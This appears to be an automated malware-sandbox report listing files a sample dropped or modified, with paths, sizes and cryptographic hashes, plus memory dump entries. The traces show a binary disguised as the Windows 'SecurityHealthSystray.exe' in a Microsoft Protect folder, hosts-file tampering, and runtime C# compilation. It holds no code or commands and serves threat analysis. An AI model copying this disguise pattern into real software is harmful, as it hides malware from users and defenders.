c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6F83.tmp

Filesize
1KB

MD5
cb9f37720b673fa48d8180d4b0b30ef5

SHA1
1dcd3bd9d127fc15031329abe02c9c27e5633216

SHA256
7a838d55e7e1f5395a4dc0f86919cf8bc41758601142b970707e2cfde3045c68

SHA512
d6744fc3f12b788ff86a47f722c2c39f2864b8aa99c70b439acaad9e1e6a779018ea7f9c8798dce404a109d48c253c4de035e0edc4c49ef51681daab333d6a6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iregbpbh.m2s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\eIUaUdBPlG\Display (1).png

Filesize
415KB

MD5
998195198560ec68287bd786de14900b

SHA1
a951ba1786f9884d889025b1f3050cf0f71c4b47

SHA256
d94510eff5c9d2fd558a89f84249389665a2c23737f5fbbcfa37e41b157ffb6b

SHA512
2911530bc3e7e8f88e89e00d9a3c207649afbc5183724ba9177d9e6f45cfc43cee6924293302f4740842896bddf5914dcedad9df0acfdfe8029b765e980d5ee4

Download Submit
C:\Users\Admin\AppData\Local\Temp\yn4cdwq1\yn4cdwq1.dll

Filesize
4KB

MD5
abdd5173fac9d9d9a1f0116160ace44b

SHA1
6d7b516093859cd6813f8f8f99f8eebf28a197dd

SHA256
48d942a9c048bad0efe8b695043631b381a8e12603fe0ef1480f1aa792c12c5b

SHA512
73267348497492a312e718d97449c1c13a313575610e4f632959c5c412024b30c96044525adcef65fc38002f520dd7b7421f0f754efd2dd4c678515a8985aa41

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
9.5MB

MD5
1efe9696fbd52aec72f56312fa0c984f

SHA1
b8b974959c744e6c68ab5cc7cceaa676cf8a8d6f

SHA256
16514b9943804dea4b5781388885abbc4a6132867444405816a76399d56bdc90

SHA512
8d29068c0be8b5cc41c5e6578c3e923fe22f703b224301e586c85797278289ac23a0f18897c2ab146e6bfef140ee8cc91d04dd8a80c9cd1c0ba0844073ff5625

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yn4cdwq1\CSC34893D4A1DC7430399A4CA364BF9B073.TMP

Filesize
652B

MD5
323847595c9f7c463c17790023e426c2

SHA1
2fb1bb7bad56e5c150ff3a213f498fc3d4edd4e3

SHA256
e7373c0cb782447384e3a70ca69012ae7d276f9200e058d117c7508f2337f3fe

SHA512
40d110f458abe7b71ffa35a7c237015eeb8990c58829337e676ea477925985214a4a3fc2ef239def277305aaddcf42fc55854054ac131826642e57f3d4c72daf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yn4cdwq1\yn4cdwq1.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yn4cdwq1\yn4cdwq1.cmdline

Filesize
607B

MD5
f6f482d56bbbe21c55d747e9a118ab7a

SHA1
ea1c94b871a231008a1c663a3d63476e52f08be8

SHA256
e50554523053cbc203a8f0999aeb804ed0d841ca7b484dd0f13537b10569c0f8

SHA512
e80358305202d5cce5c3f468a6ef8987e0293822441069cb33c12de4f30e3474cb88e895f4cfd0f7a288c9c1167506985400a33ee577aafabfb5d4bbf9e34e92

Download Submit
\??\pipe\crashpad_1576_EZPAJLXQQCCRIMSR

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/3236-61-0x000002DDB8CC0000-0x000002DDB8CC8000-memory.dmp

Filesize
32KB

Download
memory/3484-4-0x00000244C1190000-0x00000244C11B2000-memory.dmp

Filesize
136KB

Download